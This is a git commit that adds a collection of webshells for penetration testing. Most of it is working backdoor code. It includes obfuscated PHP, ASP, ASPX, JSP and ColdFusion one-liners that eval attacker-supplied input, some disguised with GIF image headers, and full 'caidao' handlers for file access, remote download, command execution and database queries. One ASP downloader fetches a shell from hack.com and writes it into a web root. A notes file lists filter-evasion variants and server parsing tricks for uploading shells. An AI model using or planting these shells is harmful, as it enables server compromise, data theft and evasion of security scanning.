update webshell Penetration testing2013 beta

This commit is contained in:
tennc 2013-05-24 08:23:49 +08:00
parent c871f6eb77
commit 733618bc2a
28 changed files with 19943 additions and 0 deletions

19
asp/ice.asp Normal file

File diff suppressed because one or more lines are too long

1295
asp/vps提权马.asp Normal file

File diff suppressed because one or more lines are too long

1355
asp/不灭之魂.asp Normal file

File diff suppressed because one or more lines are too long

2578
aspx/icesword.aspx Normal file

File diff suppressed because it is too large Load diff

1
caidao-shell/404.php Normal file
View file

@ -0,0 +1 @@
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

BIN
caidao-shell/aspx.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.7 KiB

View file

@ -0,0 +1,11 @@
<%
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://hack.com/shell.txt",0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2
%>

1
caidao-shell/fuck.php Normal file
View file

@ -0,0 +1 @@
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

1
caidao-shell/guo.php Normal file
View file

@ -0,0 +1 @@
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

22
caidao-shell/hkmjj.asp Normal file
View file

@ -0,0 +1,22 @@
<%
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
Function DeCode (Coded)
On Error Resume Next
For i = 1 To Len (Coded)
Curchar = Mid (Coded, i, 1)
If Asc (Curchar) = 16 then
Curchar = chr (8)
Elseif Asc (Curchar) = 24 then
Curchar = chr (12)
Elseif Asc (Curchar) = 32 then
Curchar = chr (18)
Else
Curchar = chr (Asc (Curchar) -3)
End if
DeCode = Decode&Curchar
Next
End Function
'response.write(decode(codeds))
' ²Ëµ¶Á¬½Ó /hkmjj.asp?xx=x ,ÃÜÂë hkmjj
%>

2
caidao-shell/ice.asp Normal file
View file

@ -0,0 +1,2 @@
GIF89a
<%eval request("ice")%>

After

Width:  |  Height:  |  Size: 30 B

2
caidao-shell/ice.aspx Normal file
View file

@ -0,0 +1,2 @@
GIF89a
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>

After

Width:  |  Height:  |  Size: 75 B

27
caidao-shell/ice.cfm Normal file
View file

@ -0,0 +1,27 @@
<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>

BIN
caidao-shell/ice.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 8.8 KiB

59
caidao-shell/ice.jsp Normal file
View file

@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="ice";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

1
caidao-shell/ice.php Normal file
View file

@ -0,0 +1 @@
<?php ${${eval($_POST[ice])}};?>

BIN
caidao-shell/mdb.asp Normal file

Binary file not shown.

BIN
caidao-shell/php.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.9 KiB

86
caidao-shell/说明.log Normal file
View file

@ -0,0 +1,86 @@
GIF89a 图片头
[+]---------------------------------PHP---------------------------------[+]
<?php @eval($_POST['ice']);?>
<?php header('status:404');${${eval($_POST[ice])}};?>
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
// 同目录生成 ice.php
[+]---------------------------------PHP---------------------------------[+]
***************************************************************************
[+]---------------------------------ASP---------------------------------[+]
<%eval request("ice")%>
<%www=REquEst("ice"):EvaL(www)%>
<%
Dim ConKey:ConKey="ice"
Dim InValue:InValue=Request(ConKey)
eval(InValue)
%>
<%E=request("ice") execute E%>
<%
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xxx.com/shell.txt",0 'asp木马文本格式地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "E:\WWWROOT\xxx.asp",2
%>
┼攠數畣整爠煥敵瑳∨≡┩愾 // ANSI—>Unicode ,密码: a
┼攠數畣整爠煥敵瑳∨捩≥┩愾 //密码 ice
上传一个图片一句话(xxx.jpg)。再上传一个.asp文件去包含: <!--#include file="xxx.jpg" -->
[+]---------------------------------ASP---------------------------------[+]
***************************************************************************
[+]---------------------------------ASPX---------------------------------[+]
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
[+]---------------------------------ASPX---------------------------------[+]
IIS 6.0 解析: x.asp/x.jpg x.asp;x.jpg ;如果遇到安全狗,畸形会被拦截,可以尝试将一句话的文件名改为 ;x.asp;x.jpg (IIS 7.5 可以试试 a.aspx.a;.a.aspx.jpg..jpg 这样的)
Nginx 解析: x.jpg/.php x.jpg%00.php
Apache : x.php.x
xx.jpg.jsp,xx.png.jsp
以上为 php、asp、aspx一句话木马的客户端密码均为 ice 。这是一句话的几种写法,有些可以逃过内容审查
-- 冰锋刺客 --
2012-07-21

1808
jsp/icesword.jsp Normal file

File diff suppressed because it is too large Load diff

993
jsp/suiyue.jsp Normal file
View file

@ -0,0 +1,993 @@
<%
/**
JFolder V0.9 windows platform
@Filename JFolder.jsp
@Description 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能较弱。
@Bugs : 下载时中文文件名无法正常显示123456789
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本0 : 中文; 1英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 岁月-版权【冰锋刺客-整理】 </font>"," <font color=red> Thanks for your support - - by Syue http://www.syue.com </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
